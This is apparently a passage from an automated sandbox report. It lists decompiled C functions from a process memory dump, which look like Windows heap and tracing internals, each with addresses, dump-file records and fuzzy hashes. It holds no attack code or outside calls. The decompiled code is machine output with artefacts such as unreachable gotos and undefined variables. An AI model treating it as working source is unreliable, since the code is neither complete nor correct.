                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v56);
                                                              				_push(0x10);
                                                              				_push(0x402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                              			}















                                                              0x04c68f6a
                                                              0x04c68f79
                                                              0x04c68f81
                                                              0x04c68f84
                                                              0x04c68f8b
                                                              0x04c68f91
                                                              0x04c68f94
                                                              0x04c68f9e
                                                              0x04c68fb0
                                                              0x04c68fa0
                                                              0x04c68fa9
                                                              0x04c68fa9
                                                              0x04c68fbb
                                                              0x04c68fbc
                                                              0x04c68fbe
                                                              0x04c68fc3
                                                              0x04c68fd6

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fab141605ba3aaaa9a3472f143f63af6bc0ea2f2627a58589dc0940d59021247
                                                              • Instruction ID: 684077918d600890c440fb20a06b32801158e917fa57b8a70f1a40f7164296dc
                                                              • Opcode Fuzzy Hash: fab141605ba3aaaa9a3472f143f63af6bc0ea2f2627a58589dc0940d59021247
                                                              • Instruction Fuzzy Hash: 30014474A0520CAFDB04EFA8D545AAEB7F4EF48700F108499F905EB380EA74EA00DB95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E04C5131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				short _v50;
                                                              				char _v56;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t32;
                                                              				_v20 = _a4;
                                                              				_v12 = _a8;
                                                              				_v24 = __ecx;
                                                              				_v16 = __edx;
                                                              				_v50 = 0x1021;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0380;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                              				}
                                                              				_push( &_v56);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                              			}















                                                              0x04c5131b
                                                              0x04c5132a
                                                              0x04c51330
                                                              0x04c51336
                                                              0x04c5133e
                                                              0x04c51341
                                                              0x04c51344
                                                              0x04c5134f
                                                              0x04c51361
                                                              0x04c51351
                                                              0x04c5135a
                                                              0x04c5135a
                                                              0x04c5136c
                                                              0x04c5136d
                                                              0x04c5136f
                                                              0x04c51374
                                                              0x04c51387

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1cabbcee057fb25927fbc5fefaa3e0998b2d25b918972553ba7a6eea01db802f
                                                              • Instruction ID: b6a901070e000627097ff807a5c7be8256cd4a68ee7274bbc064af651d93eb85
                                                              • Opcode Fuzzy Hash: 1cabbcee057fb25927fbc5fefaa3e0998b2d25b918972553ba7a6eea01db802f
                                                              • Instruction Fuzzy Hash: B3013171E05208AFDB04DFA9D545AAEB7F4FF48700F044099FC45EB391EA74AA40DB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BBC577(void* __ecx, char _a4) {
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				void* _t17;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              
                                                              				_t18 = __ecx;
                                                              				_t21 = __ecx;
                                                              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04BBC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					__eflags = _a4;
                                                              					if(__eflags != 0) {
                                                              						L10:
                                                              						E04C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                              						L9:
                                                              						return 0;
                                                              					}
                                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              					if(__eflags == 0) {
                                                              						goto L10;
                                                              					}
                                                              					goto L9;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}









                                                              0x04bbc577
                                                              0x04bbc57d
                                                              0x04bbc581
                                                              0x04bbc5b5
                                                              0x04bbc5b9
                                                              0x04bbc5ce
                                                              0x04bbc5ce
                                                              0x04bbc5ca
                                                              0x00000000
                                                              0x04bbc5ca
                                                              0x04bbc5c4
                                                              0x04bbc5c8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bbc5ad
                                                              0x00000000
                                                              0x04bbc5af

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 63d6142d57bc092ce41bd47650ff11c4dcc16942ca98b4c8ea30e74ecfd505fb
                                                              • Instruction ID: a2fb4e496f64c0939d36c582d2418e84b087020544769dba6a132b7e1373c66c
                                                              • Opcode Fuzzy Hash: 63d6142d57bc092ce41bd47650ff11c4dcc16942ca98b4c8ea30e74ecfd505fb
                                                              • Instruction Fuzzy Hash: 9BF06DB29156909AE721DE188045BB67FF4DB05664F44C4EED59687642C7E4F880C2D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E04C52073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                              				void* __esi;
                                                              				signed char _t3;
                                                              				signed char _t7;
                                                              				void* _t19;
                                                              
                                                              				_t17 = __ecx;
                                                              				_t3 = E04C4FD22(__ecx);
                                                              				_t19 =  *0x4c8849c - _t3; // 0x0
                                                              				if(_t19 == 0) {
                                                              					__eflags = _t17 -  *0x4c88748; // 0x0
                                                              					if(__eflags <= 0) {
                                                              						E04C51C06();
                                                              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                              						__eflags = _t3;
                                                              						if(_t3 != 0) {
                                                              							L5:
                                                              							__eflags =  *0x4c88724 & 0x00000004;
                                                              							if(( *0x4c88724 & 0x00000004) == 0) {
                                                              								asm("int3");
                                                              								return _t3;
                                                              							}
                                                              						} else {
                                                              							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                              							__eflags = _t3 - 3;
                                                              							if(_t3 == 3) {
                                                              								goto L5;
                                                              							}
                                                              						}
                                                              					}
                                                              					return _t3;
                                                              				} else {
                                                              					_t7 =  *0x4c88724; // 0x0
                                                              					return E04C48DF1(__ebx, 0xc0000374, 0x4c85890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                              				}
                                                              			}







                                                              0x04c52076
                                                              0x04c52078
                                                              0x04c5207d
                                                              0x04c52083
                                                              0x04c520a4
                                                              0x04c520aa
                                                              0x04c520ac
                                                              0x04c520b7
                                                              0x04c520ba
                                                              0x04c520bc
                                                              0x04c520c9
                                                              0x04c520c9
                                                              0x04c520d0
                                                              0x04c520d2
                                                              0x00000000
                                                              0x04c520d2
                                                              0x04c520be
                                                              0x04c520c3
                                                              0x04c520c5
                                                              0x04c520c7
                                                              0x00000000
                                                              0x00000000
                                                              0x04c520c7
                                                              0x04c520bc
                                                              0x04c520d4
                                                              0x04c52085
                                                              0x04c52085
                                                              0x04c520a3
                                                              0x04c520a3

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e970beb2800d056dc22c9757a91e8e8c2a04d5ed06448b5b8ec146741f6d1e2c
                                                              • Instruction ID: d67ff13e0845a2ebc6e25a06e315f715d3f20c70b326f1c5ff0ed417e2a3fc48
                                                              • Opcode Fuzzy Hash: e970beb2800d056dc22c9757a91e8e8c2a04d5ed06448b5b8ec146741f6d1e2c
                                                              • Instruction Fuzzy Hash: E1F0827A4161844AEF367F2565113997BE2D7C5118B49048AE85017610C939BAC3DE28
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 43%
                                                              			E04C68D34(intOrPtr __ecx, intOrPtr __edx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				short _v42;
                                                              				char _v48;
                                                              				signed char* _t12;
                                                              				intOrPtr _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t25;
                                                              				signed int _t26;
                                                              
                                                              				_t23 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t26;
                                                              				_v16 = __ecx;
                                                              				_v42 = 0x1c2b;
                                                              				_v12 = __edx;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t12 = 0x7ffe0386;
                                                              				} else {
                                                              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v48);
                                                              				_push(8);
                                                              				_push(0x20402);
                                                              				_push( *_t12 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                              			}













                                                              0x04c68d34
                                                              0x04c68d43
                                                              0x04c68d4b
                                                              0x04c68d4e
                                                              0x04c68d52
                                                              0x04c68d5c
                                                              0x04c68d6e
                                                              0x04c68d5e
                                                              0x04c68d67
                                                              0x04c68d67
                                                              0x04c68d79
                                                              0x04c68d7a
                                                              0x04c68d7c
                                                              0x04c68d81
                                                              0x04c68d94

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: adc93765736e3a6ec6eef2e6d513bc0256845d1525cd6a7edb9c38930fc1b125
                                                              • Instruction ID: d94d8056a32e3a2c83a1715577e400113bec6d76163aa572832389bd09a0cb64
                                                              • Opcode Fuzzy Hash: adc93765736e3a6ec6eef2e6d513bc0256845d1525cd6a7edb9c38930fc1b125
                                                              • Instruction Fuzzy Hash: 0BF0B470E046089FDB04EFB8D441B6EB7B4EF04300F1080D9E906EB280EA34E900C764
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04BD927A(void* __ecx) {
                                                              				signed int _t11;
                                                              				void* _t14;
                                                              
                                                              				_t11 = L04BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                              				if(_t11 != 0) {
                                                              					E04BDFA60(_t11, 0, 0x98);
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					asm("movsd");
                                                              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                              					E04BD92C6(_t11, _t14);
                                                              				}
                                                              				return _t11;
                                                              			}





                                                              0x04bd9295
                                                              0x04bd9299
                                                              0x04bd929f
                                                              0x04bd92aa
                                                              0x04bd92ad
                                                              0x04bd92ae
                                                              0x04bd92af
                                                              0x04bd92b0
                                                              0x04bd92b4
                                                              0x04bd92bb
                                                              0x04bd92bb
                                                              0x04bd92c5

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                              • Instruction ID: 72ef9a4d868c2203ca65e4c65aec5ea3085dbbbb64b2c5915b9cba9c1a185018
                                                              • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                              • Instruction Fuzzy Hash: 4EE09272340A406BEB219E5ADC84F5777ADEF82725F0440F9B9055F282DAF6ED0987A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E04C68CD6(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				short _v38;
                                                              				char _v44;
                                                              				signed char* _t11;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t23;
                                                              				intOrPtr _t24;
                                                              				signed int _t25;
                                                              
                                                              				_v8 =  *0x4c8d360 ^ _t25;
                                                              				_v12 = __ecx;
                                                              				_v38 = 0x1c2d;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t11 = 0x7ffe0386;
                                                              				} else {
                                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v44);
                                                              				_push(0xffffffe4);
                                                              				_push(0x402);
                                                              				_push( *_t11 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                              			}













                                                              0x04c68ce5
                                                              0x04c68ced
                                                              0x04c68cf0
                                                              0x04c68cfb
                                                              0x04c68d0d
                                                              0x04c68cfd
                                                              0x04c68d06
                                                              0x04c68d06
                                                              0x04c68d18
                                                              0x04c68d19
                                                              0x04c68d1b
                                                              0x04c68d20
                                                              0x04c68d33

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f8831fcbda143496f953cc91edd7665f30ab810a856029c98286520570768561
                                                              • Instruction ID: be0f7c1b58b984dc71fc4bdd1f96e2d0345dc56790935818423648634b590a6a
                                                              • Opcode Fuzzy Hash: f8831fcbda143496f953cc91edd7665f30ab810a856029c98286520570768561
                                                              • Instruction Fuzzy Hash: F5F08270A05609ABDB04EFA9E945EAE77B4EF49304F1441D9F916EB2C0EA34ED00D764
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 88%
                                                              			E04BB746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                              				signed int _t8;
                                                              				void* _t10;
                                                              				short* _t17;
                                                              				void* _t19;
                                                              				intOrPtr _t20;
                                                              				void* _t21;
                                                              
                                                              				_t20 = __esi;
                                                              				_t19 = __edi;
                                                              				_t17 = __ebx;
                                                              				if( *((char*)(_t21 - 0x25)) != 0) {
                                                              					if(__ecx == 0) {
                                                              						E04BAEB70(__ecx, 0x4c879a0);
                                                              					} else {
                                                              						asm("lock xadd [ecx], eax");
                                                              						if((_t8 | 0xffffffff) == 0) {
                                                              							_push( *((intOrPtr*)(__ecx + 4)));
                                                              							E04BD95D0();
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                              						}
                                                              					}
                                                              					L10:
                                                              				}
                                                              				_t10 = _t19 + _t19;
                                                              				if(_t20 >= _t10) {
                                                              					if(_t19 != 0) {
                                                              						 *_t17 = 0;
                                                              						return 0;
                                                              					}
                                                              				}
                                                              				return _t10;
                                                              				goto L10;
                                                              			}









                                                              0x04bb746d
                                                              0x04bb746d
                                                              0x04bb746d
                                                              0x04bb7471
                                                              0x04bb7488
                                                              0x04bff92d
                                                              0x04bb748e
                                                              0x04bb7491
                                                              0x04bb7495
                                                              0x04bff937
                                                              0x04bff93a
                                                              0x04bff94e
                                                              0x04bff953
                                                              0x04bff956
                                                              0x04bff956
                                                              0x04bb7495
                                                              0x00000000
                                                              0x04bb7488
                                                              0x04bb7473
                                                              0x04bb7478
                                                              0x04bb747d
                                                              0x04bb7481
                                                              0x00000000
                                                              0x04bb7481
                                                              0x04bb747d
                                                              0x04bb747a
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 43f6b9cd8ec0a45d22232bd4f9e6fbc513c3cdcf02c3a0e34a4c1737492b8943
                                                              • Instruction ID: b2ffcf0971a3ea6df6ad84ad22953736dd2655cedaed748975d55c22dd09c1fe
                                                              • Opcode Fuzzy Hash: 43f6b9cd8ec0a45d22232bd4f9e6fbc513c3cdcf02c3a0e34a4c1737492b8943
                                                              • Instruction Fuzzy Hash: 77F0B434705144AADF019B6CC840BF9BB71AF84319F0442E5D8D5AB150FBA4F80087C5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B94F2E(void* __ecx, char _a4) {
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				void* _t17;
                                                              				void* _t19;
                                                              				void* _t20;
                                                              				void* _t21;
                                                              
                                                              				_t18 = __ecx;
                                                              				_t21 = __ecx;
                                                              				if(__ecx == 0) {
                                                              					L6:
                                                              					__eflags = _a4;
                                                              					if(__eflags != 0) {
                                                              						L8:
                                                              						E04C688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                              						L9:
                                                              						return 0;
                                                              					}
                                                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                              					if(__eflags != 0) {
                                                              						goto L9;
                                                              					}
                                                              					goto L8;
                                                              				}
                                                              				_t18 = __ecx + 0x30;
                                                              				if(E04BBC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4b71030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					goto L6;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}









                                                              0x04b94f2e
                                                              0x04b94f34
                                                              0x04b94f38
                                                              0x04bf0b85
                                                              0x04bf0b85
                                                              0x04bf0b89
                                                              0x04bf0b9a
                                                              0x04bf0b9a
                                                              0x04bf0b9f
                                                              0x00000000
                                                              0x04bf0b9f
                                                              0x04bf0b94
                                                              0x04bf0b98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf0b98
                                                              0x04b94f3e
                                                              0x04b94f48
                                                              0x00000000
                                                              0x04b94f6e
                                                              0x00000000
                                                              0x04b94f70

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a81ae3dc1e3922135dc07e49bb3b78a3e9f750c0f1fead5cab6ae9de0581220b
                                                              • Instruction ID: ffe785707c78d08ac8ca2fe9f4ed190f8d3a4c2980932e68dc4874dcc9a9c066
                                                              • Opcode Fuzzy Hash: a81ae3dc1e3922135dc07e49bb3b78a3e9f750c0f1fead5cab6ae9de0581220b
                                                              • Instruction Fuzzy Hash: A5F0B4325396948FDB61EB18C940B22B7D4EB087B8F0444E4D50987533C724FC49C650
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 36%
                                                              			E04C68B58(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v20;
                                                              				short _v46;
                                                              				char _v52;
                                                              				signed char* _t11;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t22;
                                                              				intOrPtr _t23;
                                                              				intOrPtr _t24;
                                                              				signed int _t25;
                                                              
                                                              				_v8 =  *0x4c8d360 ^ _t25;
                                                              				_v20 = __ecx;
                                                              				_v46 = 0x1c26;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t11 = 0x7ffe0386;
                                                              				} else {
                                                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v52);
                                                              				_push(4);
                                                              				_push(0x402);
                                                              				_push( *_t11 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                              			}













                                                              0x04c68b67
                                                              0x04c68b6f
                                                              0x04c68b72
                                                              0x04c68b7d
                                                              0x04c68b8f
                                                              0x04c68b7f
                                                              0x04c68b88
                                                              0x04c68b88
                                                              0x04c68b9a
                                                              0x04c68b9b
                                                              0x04c68b9d
                                                              0x04c68ba2
                                                              0x04c68bb5

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6ce6dea851577e14a1915c6bec42ff8e78c761a8c97c696304d8381019a20b14
                                                              • Instruction ID: e4f06df6d464d60986384957421fb17e95024dfff6faeeae528de0a08ff30cc3
                                                              • Opcode Fuzzy Hash: 6ce6dea851577e14a1915c6bec42ff8e78c761a8c97c696304d8381019a20b14
                                                              • Instruction Fuzzy Hash: 2AF082B0A05258ABEB14EBA8D946E7EB3B8EF44304F440499B906DB3C0FA74E900C794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 79%
                                                              			E04B9F358(void* __ecx, signed int __edx) {
                                                              				char _v8;
                                                              				signed int _t9;
                                                              				void* _t20;
                                                              
                                                              				_push(__ecx);
                                                              				_t9 = 2;
                                                              				_t20 = 0;
                                                              				if(E04BCF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                              					_t20 = L04BB4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                              				}
                                                              				return _t20;
                                                              			}






                                                              0x04b9f35d
                                                              0x04b9f361
                                                              0x04b9f367
                                                              0x04b9f372
                                                              0x04b9f38c
                                                              0x04b9f38c
                                                              0x04b9f394

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                              • Instruction ID: d50e8514c7b5c16382f8ef9438bf3581cf17275252ecd3131d2bdf6b1b15f482
                                                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                              • Instruction Fuzzy Hash: 67E0DF32A40118BBDF31ABD99E05FBABBADEB88B60F0001E5B904D7190D574AE00C6D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BAFF60(intOrPtr _a4) {
                                                              				void* __ecx;
                                                              				void* __ebp;
                                                              				void* _t13;
                                                              				intOrPtr _t14;
                                                              				void* _t15;
                                                              				void* _t16;
                                                              				void* _t17;
                                                              
                                                              				_t14 = _a4;
                                                              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x4b711a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                              					return E04C688F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                                              				} else {
                                                              					return E04BB0050(_t14);
                                                              				}
                                                              			}










                                                              0x04baff66
                                                              0x04baff6b
                                                              0x00000000
                                                              0x04baff8f
                                                              0x00000000
                                                              0x04baff8f

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7613f1cb04b67d3e1badb80417b2fb194d6112bbd7b73c6fd623e004c55657c8
                                                              • Instruction ID: 1910ea8255e3d12ef22457cd2c253043573c855b9b8dfbef362c945dc1a89bf1
                                                              • Opcode Fuzzy Hash: 7613f1cb04b67d3e1badb80417b2fb194d6112bbd7b73c6fd623e004c55657c8
                                                              • Instruction Fuzzy Hash: FCE09AB120F2049EE734EB65D0E0FBA3798DB42665F198099E0084B501C622F8A0C256
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04C4D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                              				void* _t5;
                                                              
                                                              				if(_a4 != 0) {
                                                              					_t5 = L04B9E8B0(__ecx, _a4, 0xfff);
                                                              					L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                              					return _t5;
                                                              				}
                                                              				return 0xc000000d;
                                                              			}




                                                              0x04c4d38a
                                                              0x04c4d39b
                                                              0x04c4d3b1
                                                              0x00000000
                                                              0x04c4d3b6
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                              • Instruction ID: 0b456629c0dc0e779597ba9a9409918dd85042dcf6a5d58388e5d23243d94052
                                                              • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                              • Instruction Fuzzy Hash: DEE0C231280244FBEF226E45CD00FB97B66DB807A4F104071FE095A6A0CA75FD91E6C4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BCA185() {
                                                              				void* __ecx;
                                                              				intOrPtr* _t5;
                                                              
                                                              				if( *0x4c867e4 >= 0xa) {
                                                              					if(_t5 < 0x4c86800 || _t5 >= 0x4c86900) {
                                                              						return L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                              					} else {
                                                              						goto L1;
                                                              					}
                                                              				} else {
                                                              					L1:
                                                              					return E04BB0010(0x4c867e0, _t5);
                                                              				}
                                                              			}





                                                              0x04bca190
                                                              0x04bca1a6
                                                              0x04bca1c2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bca192
                                                              0x04bca192
                                                              0x04bca19f
                                                              0x04bca19f

                                                              Memory Dump Source
